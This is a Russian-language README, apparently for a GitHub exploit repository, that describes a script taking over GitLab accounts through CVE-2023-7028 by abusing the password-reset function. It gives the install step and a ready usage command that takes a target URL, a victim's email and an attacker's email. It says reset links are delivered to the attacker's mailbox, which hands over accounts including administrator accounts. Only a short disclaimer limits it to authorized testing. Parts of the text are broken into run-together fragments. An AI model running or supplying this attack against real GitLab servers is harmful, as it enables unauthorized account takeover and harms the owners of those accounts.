
Этот репозиторий содержит эксплойт для CVE-2023-7028, критической уязвимости в GitLab, которая позволяет атакующему злоупотребить функцией сброса пароля и получить контроль над учётными записями, включая учётные записи администратора.
/users/password в GitLabrequestspip install requests
python3 attack.py -u <gitlab_url> -t <target_email> -e <attacker_email>
Пример:
python3 attack.py -u http://example.com -t [email protected] -e [email protected]
Эксплойт отправит письма со сбросом пароля на адреса как жертвы, так и атакующего. После успешного выполнения проверьте почтовый ящик атакующего на наличие ссылки для сброса пароля.
root).Данный эксплойт предназначен только для образовательных целей и авторизованного тестирования.
Используйте этот код ответственно. Несанкционированный доступ к системам противозаконен.